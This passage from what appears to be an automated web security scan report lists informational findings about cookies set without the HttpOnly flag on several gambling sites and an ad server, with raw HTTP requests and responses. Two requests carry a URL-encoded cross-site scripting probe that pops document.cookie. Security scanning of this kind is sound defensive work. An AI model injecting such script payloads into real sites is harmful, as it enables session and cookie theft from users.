X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kckq0e45x234ip2s44zglqzs; path=/; HttpOnly
Set-Cookie: LanguageCode=BRA; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=133D5CFD64A86A8D4E41FBAF35DFED9F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:02:48 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: UniqueVisitorID=133D5CFD64A86A8D4E41FBAF35DFED9F; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: LanguageCode=BRA; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:02:48 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43122


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.100. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=4284276430058379

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=10ca289019af23418475b1d5b7b65193; expires=Tue, 15-May-2012 12:52:09 GMT; path=/
Content-Length: 3694
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...

12.101. http://d.tradex.openx.com/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

OAID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=7833&campaignid=2580&zoneid=4408&loc=1&referer=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&cb=92acc323c9&r_id=b7d3130441279250d437d1e5dbea5016&r_ts=llah2x HTTP/1.1
Host: d.tradex.openx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: OAID=e60be527d0ee36a1d9d3d53bd7c584e6

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=e60be527d0ee36a1d9d3d53bd7c584e6; expires=Tue, 15-May-2012 12:52:13 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.102. http://da.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_12
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:13:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=dmowgp551rkkdn3soilwdfnr; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:13:58 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: UniqueVisitorID=BBFDDD60B27B560BD9F8970BEAFB9576; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:13:58 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.103. http://da.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_27
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:24:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=szufvcqect3lbw2c3qkhio45; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=A8F6C2B6CEF5B63478AED95B09F2EE9E&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:24:19 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: UniqueVisitorID=A8F6C2B6CEF5B63478AED95B09F2EE9E; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:24:19 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.104. http://da.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_1
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:02:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1qfvcvf4rzhgeoufgbf30g55; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=DB22A1CF13A4E4246723822650A86F19&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:02:39 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: UniqueVisitorID=DB22A1CF13A4E4246723822650A86F19; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:02:39 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44564


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.105. http://da.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://da.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_8
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: da.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jerxym45yqox5445cm4l3m45; path=/; HttpOnly
Set-Cookie: LanguageCode=DAN; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=C13466F88A3C2E3F7EF40181A63E88A6&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:33:44 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: UniqueVisitorID=C13466F88A3C2E3F7EF40181A63E88A6; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: LanguageCode=DAN; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:33:44 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.106. http://de.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_12
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1tkc3d3ftxfybx55a2wzek55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=4AC5C3DD290CC9374CADA3E9FBEDEE3D; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48389


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.107. http://de.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_27
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pitwctjdcp5uqtuzoc2m5l55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=2A1881799ACDD7EA946C26947FFD682F&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:35:06 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: UniqueVisitorID=2A1881799ACDD7EA946C26947FFD682F; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:35:06 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45192


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.108. http://de.scratch2cash.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.scratch2cash.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_1
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.scratch2cash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=1ayip0bh1mevynynz4icpq55; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: CSI_1=EncryptedUniqueVisitorID=388748C1F7262AA76BF3603A585497C0&AffiliateID=1&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratch2cash.com; expires=Fri, 16-May-2031 12:31:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: BO=FM; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: UniqueVisitorID=388748C1F7262AA76BF3603A585497C0; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratch2cash.com; expires=Fri, 16-May-2014 12:31:29 GMT; path=/
Set-Cookie: CSITemp=1; domain=scratch2cash.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45149


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.109. http://de.scratchcardheaven.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.scratchcardheaven.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_8
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: de.scratchcardheaven.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:31:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=h25bh155gvlaq045moqwhh2p; path=/; HttpOnly
Set-Cookie: LanguageCode=GER; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: CSI_8=EncryptedUniqueVisitorID=AA70828418124DA51B8663347992C3C5&AffiliateID=8&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=scratchcardheaven.com; expires=Fri, 16-May-2031 12:31:28 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: BO=FM; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: UniqueVisitorID=AA70828418124DA51B8663347992C3C5; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: LanguageCode=GER; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=scratchcardheaven.com; expires=Fri, 16-May-2014 12:31:28 GMT; path=/
Set-Cookie: CSITemp=8; domain=scratchcardheaven.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 45487


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.110. http://el.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://el.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

LanguageCode
CSI_27
RegistrationMode
BO
UniqueVisitorID
CountryCode
CSITemp

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: el.karamba.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=25hayo55lagve42tdt2pyq55; path=/; HttpOnly
Set-Cookie: LanguageCode=GRE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSI_27=EncryptedUniqueVisitorID=B283729EB6F5F870238B9E9540B5B5C7&AffiliateID=27&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=karamba.com; expires=Fri, 16-May-2031 12:32:17 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: BO=FM; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: UniqueVisitorID=B283729EB6F5F870238B9E9540B5B5C7; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: LanguageCode=GRE; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CountryCode=US; domain=karamba.com; expires=Fri, 16-May-2014 12:32:17 GMT; path=/
Set-Cookie: CSITemp=27; domain=karamba.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 47896


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.111. http://es.bigmoneyscratch.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.bigmoneyscratch.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:12:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=x4ssgtmj3jlvc145m24vlpap; path=/; HttpOnly
Set-Cookie: LanguageCode=SPA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:12:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: UniqueVisitorID=64782A228F974BACFC7F6F262E43ABE6; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:12:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48844


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...

12.112. http://es.karamba.com/Home.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://es.karamba.com
Path:   /Home.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Home.aspx HTTP/1.1
Host: es.karamba.com
